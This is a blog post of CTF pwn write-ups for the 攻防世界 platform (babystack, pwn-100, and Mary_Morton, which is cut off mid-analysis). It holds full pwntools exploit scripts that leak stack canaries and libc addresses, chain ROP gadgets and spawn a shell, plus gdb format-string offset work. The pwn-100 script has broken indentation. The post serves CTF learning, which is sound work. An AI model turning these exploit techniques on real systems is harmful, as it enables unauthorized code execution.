<!DOCTYPE HTML>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta name="keywords" content="攻防世界, Apr1L&#39;s blog">
    <meta name="description" content="二进制萌新QAQ">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>攻防世界 | Apr1L&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Apr1L&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Apr1L&#39;s blog</div>
        <div class="logo-desc">
            
            二进制萌新QAQ
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('http://www.005.tv/uploads/allimg/190705/66-1ZF5145U3G7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">攻防世界</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/pwn/">
                                <span class="chip bg-color">pwn</span>
                            </a>
                        
                            <a href="/tags/canary/">
                                <span class="chip bg-color">canary</span>
                            </a>
                        
                            <a href="/tags/栈溢出/">
                                <span class="chip bg-color">栈溢出</span>
                            </a>
                        
                            <a href="/tags/ROP/">
                                <span class="chip bg-color">ROP</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/pwn/" class="post-category">
                                pwn
                            </a>
                        
                            <a href="/categories/pwn/wp/" class="post-category">
                                wp
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2019-10-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="pwn1"><a href="#pwn1" class="headerlink" title="pwn1"></a>pwn1</h1><h2 id="分析程序"><a href="#分析程序" class="headerlink" title="分析程序"></a>分析程序</h2><pre><code>gdb-peda$ checksec babystack
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : FULL</code></pre><p>我们发现程序存在<code>canary</code>，并且没有<code>system</code>和<code>/bin/sh</code>，于是我们的思路就有了：</p>
<ul>
<li>通过程序的<code>print</code>函数leak<code>canary</code>的值</li>
<li>泄露<code>puts</code>真正地址，计算出<code>libcbase</code></li>
<li>构造<code>ROP chain</code>来get shell</li>
</ul>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><pre class=" language-python"><code class="language-python"><span class="token comment" spellcheck="true">#!usr/bin/python</span>
<span class="token comment" spellcheck="true">#-- coding: utf:8 --</span>
<span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>
<span class="token keyword">from</span> LibcSearcher <span class="token keyword">import</span> <span class="token operator">*</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">'111.198.29.45'</span><span class="token punctuation">,</span><span class="token number">52594</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#libc = ELF('./libc-2.23.so')</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./babystack'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#onegadget = 0x45216</span>
poprdi <span class="token operator">=</span> <span class="token number">0x0000000000400a93</span>
putsgot <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
putsplt <span class="token operator">=</span> elf<span class="token punctuation">.</span>plt<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
start <span class="token operator">=</span> <span class="token number">0x400720</span>
payload1 <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x88</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'2'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span>
canary <span class="token operator">=</span> u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">7</span><span class="token punctuation">)</span><span class="token punctuation">.</span>rjust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"canary=>"</span> <span class="token operator">+</span>hex<span class="token punctuation">(</span>canary<span class="token punctuation">)</span><span class="token punctuation">)</span>

payload2 <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x88</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>canary<span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x8</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>poprdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>putsgot<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>putsplt<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>start<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'3'</span><span class="token punctuation">)</span>
putsaddr <span class="token operator">=</span> u64<span class="token punctuation">(</span>p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span><span class="token string">'\x00'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"putsaddr=>"</span> <span class="token operator">+</span>hex<span class="token punctuation">(</span>putsaddr<span class="token punctuation">)</span><span class="token punctuation">)</span>

libc <span class="token operator">=</span> LibcSearcher<span class="token punctuation">(</span><span class="token string">'puts'</span><span class="token punctuation">,</span> putsaddr<span class="token punctuation">)</span>
libcbase <span class="token operator">=</span> putsaddr <span class="token operator">-</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'puts'</span><span class="token punctuation">)</span>
sysaddr <span class="token operator">=</span> libcbase <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'system'</span><span class="token punctuation">)</span>
binsh <span class="token operator">=</span> libcbase <span class="token operator">+</span> libc<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token string">'str_bin_sh'</span><span class="token punctuation">)</span>
onegadget <span class="token operator">=</span> libcbase <span class="token operator">+</span> onegadget
payload3 <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x88</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>canary<span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x8</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>poprdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>binsh<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>sysaddr<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>start<span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#payload3 = "a"*0x88 + p64(canary) + "a"*0x8 + p64(onegadget)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload3<span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'>> '</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span><span class="token string">'3'</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<p>看大佬的博客发现有一种用<code>one_gadget</code>的简单方法，但我过于菜鸡，并没有搞懂<code>one_gadget</code>……QAQ<br>文章我放在相关链接了，抽时间看看</p>
<h2 id="相关链接"><a href="#相关链接" class="headerlink" title="相关链接"></a>相关链接</h2><p><a href="https://xz.aliyun.com/t/2720" target="_blank" rel="noopener">glibc里的one gadget</a><br><a href="https://www.jianshu.com/p/614c97c8ca97" target="_blank" rel="noopener">exp</a></p>
<h1 id="pwn-100"><a href="#pwn-100" class="headerlink" title="pwn-100"></a>pwn-100</h1><h2 id="DynELF"><a href="#DynELF" class="headerlink" title="DynELF"></a>DynELF</h2><pre><code>p = process(&#39;./xxx&#39;)
def leak(address):
  #各种预处理
  payload = &quot;xxxxxxxx&quot; + address + &quot;xxxxxxxx&quot;
  p.send(payload)
  #各种处理
  data = p.recv(4)
  log.debug(&quot;%#x =&gt; %s&quot; % (address, (data or &#39;&#39;).encode(&#39;hex&#39;)))
  return data
d = DynELF(leak, elf=ELF(&quot;./xxx&quot;))      #初始化DynELF模块 
systemAddress = d.lookup(&#39;system&#39;, &#39;libc&#39;)  #在libc文件中搜索system函数的地址</code></pre><h2 id="使用条件"><a href="#使用条件" class="headerlink" title="使用条件"></a>使用条件</h2><ul>
<li>目标程序存在可以泄露libc空间信息的漏洞，如read@got就指向libc地址空间内</li>
<li>目标程序中存在的信息泄露漏洞能够反复触发，从而可以不断泄露libc地址空间内的信息</li>
</ul>
<h2 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h2><p>下面来说说咱们这个程序：首先程序存在很明显的栈溢出漏洞，且可以循环泄露，符合我们使用DynELF的条件，但这个程序是64位，故：</p>
<ul>
<li>64位linux下的函数需要通过rop链将参数传入寄存器，而不是依靠栈布局</li>
<li>puts函数与write函数不同，不能指定输出字符串的长度<br>在x64环境下，函数的参数是通过寄存器传递的，rdi对应第一个参数，rsi对应第二个参数，rdx对应第三个参数，往往凑不出类似“pop rdi; ret”、“pop rsi; ret”、“pop rdx; ret”等3个传参的gadget。此时，可以考虑使用__libc_csu_init函数的通用gadget，具体原理请参见<a href="https://sirhc.gitbook.io/note/pwn/libccsuinit-han-shu-de-tong-yong-gadget" target="_blank" rel="noopener"><strong>文章</strong></a>。</li>
</ul>
<p>exp:</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

p <span class="token operator">=</span> process<span class="token punctuation">(</span><span class="token string">'./pwn1'</span><span class="token punctuation">)</span>
<span class="token comment" spellcheck="true">#p = remote('111.198.29.45',46889)</span>

pop1 <span class="token operator">=</span> <span class="token number">0x40075a</span>
pop2 <span class="token operator">=</span> <span class="token number">0x400740</span>
elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">'./pwn1'</span><span class="token punctuation">)</span>
readplt <span class="token operator">=</span> elf<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span>
readgot <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'read'</span><span class="token punctuation">]</span>
putsplt <span class="token operator">=</span> elf<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
putsgot <span class="token operator">=</span> elf<span class="token punctuation">.</span>got<span class="token punctuation">[</span><span class="token string">'puts'</span><span class="token punctuation">]</span>
main <span class="token operator">=</span> <span class="token number">0x4006b8</span>
start <span class="token operator">=</span> <span class="token number">0x400550</span>
pop_rdi <span class="token operator">=</span> <span class="token number">0x400763</span>
wri <span class="token operator">=</span> <span class="token number">0x601000</span>

<span class="token keyword">def</span> <span class="token function">leak</span><span class="token punctuation">(</span>address<span class="token punctuation">)</span><span class="token punctuation">:</span>

    count <span class="token operator">=</span> <span class="token number">0</span>
    data <span class="token operator">=</span> <span class="token string">''</span>

    payload <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x48</span>
    payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>address<span class="token punctuation">)</span>
    payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>putsplt<span class="token punctuation">)</span>
    payload <span class="token operator">+=</span> p64<span class="token punctuation">(</span>start<span class="token punctuation">)</span>
    payload <span class="token operator">=</span> payload<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">200</span><span class="token punctuation">,</span><span class="token string">'b'</span><span class="token punctuation">)</span>

    p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>
    <span class="token keyword">print</span> p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'bye~\n'</span><span class="token punctuation">)</span>

    up <span class="token operator">=</span> <span class="token string">""</span>

    <span class="token keyword">while</span> <span class="token boolean">True</span><span class="token punctuation">:</span>

        c <span class="token operator">=</span> p<span class="token punctuation">.</span>recv<span class="token punctuation">(</span>numb<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">,</span>timeout<span class="token operator">=</span><span class="token number">0.1</span><span class="token punctuation">)</span>
        count <span class="token operator">+=</span> <span class="token number">1</span>

    <span class="token keyword">if</span> up <span class="token operator">==</span> <span class="token string">'\n'</span> <span class="token operator">and</span> c <span class="token operator">==</span> <span class="token string">""</span><span class="token punctuation">:</span>
        data <span class="token operator">=</span> data<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
            data <span class="token operator">+=</span> <span class="token string">"\x00"</span>
        <span class="token keyword">break</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        data <span class="token operator">+=</span> c
    up <span class="token operator">=</span> c

    data <span class="token operator">=</span> data<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span>
    log<span class="token punctuation">.</span>info<span class="token punctuation">(</span><span class="token string">"%#x => %s"</span> <span class="token operator">%</span> <span class="token punctuation">(</span>address<span class="token punctuation">,</span> <span class="token punctuation">(</span>data <span class="token operator">or</span> <span class="token string">''</span><span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'hex'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

    <span class="token keyword">return</span> data

d <span class="token operator">=</span> DynELF<span class="token punctuation">(</span>leak<span class="token punctuation">,</span> elf<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">'./pwn1'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

sysaddr <span class="token operator">=</span> d<span class="token punctuation">.</span>lookup<span class="token punctuation">(</span><span class="token string">'system'</span><span class="token punctuation">,</span><span class="token string">'libc'</span><span class="token punctuation">)</span>

<span class="token keyword">print</span> <span class="token string">"sysaddr:"</span><span class="token punctuation">,</span> hex<span class="token punctuation">(</span>sysaddr<span class="token punctuation">)</span>


<span class="token comment" spellcheck="true">#write binsh to bss</span>
payload1 <span class="token operator">=</span> <span class="token string">'a'</span><span class="token operator">*</span><span class="token number">0x48</span>
payload1 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>pop1<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>readgot<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>wri<span class="token punctuation">)</span> <span class="token operator">+</span>p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>pop2<span class="token punctuation">)</span>
payload1 <span class="token operator">+=</span><span class="token string">'\x00'</span><span class="token operator">*</span><span class="token number">56</span>
payload1 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>start<span class="token punctuation">)</span>     
payload1 <span class="token operator">=</span> payload1<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">200</span><span class="token punctuation">,</span><span class="token string">"b"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload1<span class="token punctuation">)</span>
<span class="token keyword">print</span> p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">'bye~\n'</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span><span class="token string">"/bin/sh\x00"</span><span class="token punctuation">)</span>

<span class="token comment" spellcheck="true">#getshell</span>
payload2 <span class="token operator">=</span> <span class="token string">"a"</span><span class="token operator">*</span><span class="token number">0x48</span>
payload2 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span><span class="token operator">+</span>p64<span class="token punctuation">(</span>wri<span class="token punctuation">)</span>
payload2 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>sysaddr<span class="token punctuation">)</span>
payload2 <span class="token operator">+=</span>p64<span class="token punctuation">(</span>start<span class="token punctuation">)</span>
payload2 <span class="token operator">=</span> payload2<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span><span class="token number">200</span><span class="token punctuation">,</span><span class="token string">"b"</span><span class="token punctuation">)</span>

p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload2<span class="token punctuation">)</span>

p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></code></pre>
<h2 id="相关链接-1"><a href="#相关链接-1" class="headerlink" title="相关链接"></a>相关链接</h2><p><a href="https://www.anquanke.com/post/id/85129" target="_blank" rel="noopener">借助DynELF实现无libc的漏洞利用小结</a><br><a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium-rop-zh/" target="_blank" rel="noopener">中级ROP</a></p>
<h1 id="Mary-Morton"><a href="#Mary-Morton" class="headerlink" title="Mary_Morton"></a>Mary_Morton</h1><h2 id="分析程序-1"><a href="#分析程序-1" class="headerlink" title="分析程序"></a>分析程序</h2><p>我们先checksec一下：</p>
<pre><code>gdb-peda$ checksec mary
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial</code></pre><p>可以看到程序开启了NX和CANARY保护，关于CANARY的知识可以参考这篇文章<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/mitigation/canary-zh/" target="_blank" rel="noopener"><strong>文章</strong></a>。</p>
<p>把程序放入IDA中分析一下，发现有明显的格式化字符串漏洞和栈溢出漏洞，于是这道题的思路也就有了：</p>
<ul>
<li>利用格式化字符串漏洞泄露canary的值</li>
<li>再进行栈溢出的覆盖</li>
</ul>
<h2 id="确定偏移"><a href="#确定偏移" class="headerlink" title="确定偏移"></a>确定偏移</h2><p>先确定该格式化字符串为第几个参数</p>
<pre><code>gdb-peda$ b * printf
Breakpoint 1 at 0x4006b0
gdb-peda$ r
Starting program: /home/suv11/Desktop/mary 
Welcome to the battle ! 
[Great Fairy] level pwned 
Select your weapon 
1. Stack Bufferoverflow Bug 
2. Format String Bug 
3. Exit the battle 
2
123456 

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7b04260 (&lt;__read_nocancel+7&gt;:    cmp    rax,0xfffffffffffff001)
RDX: 0x7f 
RSI: 0x7fffffffddc0 --&gt; 0xa363534333231 (&#39;123456\n&#39;)
RDI: 0x7fffffffddc0 --&gt; 0xa363534333231 (&#39;123456\n&#39;)
RBP: 0x7fffffffde50 --&gt; 0x7fffffffde90 --&gt; 0x400a50 (push   r15)
RSP: 0x7fffffffddb8 --&gt; 0x400949 (nop)
RIP: 0x7ffff7a62800 (&lt;__printf&gt;:    sub    rsp,0xd8)
R8 : 0x0 
R9 : 0x0 
R10: 0x25b 
R11: 0x7ffff7a62800 (&lt;__printf&gt;:    sub    rsp,0xd8)
R12: 0x400730 (xor    ebp,ebp)
R13: 0x7fffffffdf70 --&gt; 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a627f7 &lt;__fprintf+135&gt;:    add    rsp,0xd8
   0x7ffff7a627fe &lt;__fprintf+142&gt;:    ret    
   0x7ffff7a627ff:    nop
=&gt; 0x7ffff7a62800 &lt;__printf&gt;:    sub    rsp,0xd8
   0x7ffff7a62807 &lt;__printf+7&gt;:    test   al,al
   0x7ffff7a62809 &lt;__printf+9&gt;:    mov    QWORD PTR [rsp+0x28],rsi
   0x7ffff7a6280e &lt;__printf+14&gt;:    mov    QWORD PTR [rsp+0x30],rdx
   0x7ffff7a62813 &lt;__printf+19&gt;:    mov    QWORD PTR [rsp+0x38],rcx
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddb8 --&gt; 0x400949 (nop)
0008| 0x7fffffffddc0 --&gt; 0xa363534333231 (&#39;123456\n&#39;)   &lt;== 参数位置
0016| 0x7fffffffddc8 --&gt; 0x0 
0024| 0x7fffffffddd0 --&gt; 0x0 
0032| 0x7fffffffddd8 --&gt; 0x0 
0040| 0x7fffffffdde0 --&gt; 0x0 
0048| 0x7fffffffdde8 --&gt; 0x0 
0056| 0x7fffffffddf0 --&gt; 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, __printf (format=0x7fffffffddc0 &quot;123456\n&quot;) at printf.c:28
28    printf.c: No such file or directory.
gdb-peda$ fmtarg 0x7fffffffddc0
The index of format argument : 7 (&quot;\%6$p&quot;)</code></pre><p>可以确定为格式化字符串的第6个参数</p>
<p>再看IDA中的栈信息</p>
<pre><code>-0000000000000090 buf             db ?
-000000000000008F                 db ? ; undefined
-000000000000008E                 db ? ; undefined
-000000000000008D                 db ? ; undefined
-000000000000008C                 db ? ; undefined
-000000000000008B                 db ? ; undefined
       ······                         ······
-000000000000000C                 db ? ; undefined
-000000000000000B                 db ? ; undefined
-000000000000000A                 db ? ; undefined
-0000000000000009                 db ? ; undefined
-0000000000000008 var_8           dq ?
+0000000000000000  s              db 8 dup(?)
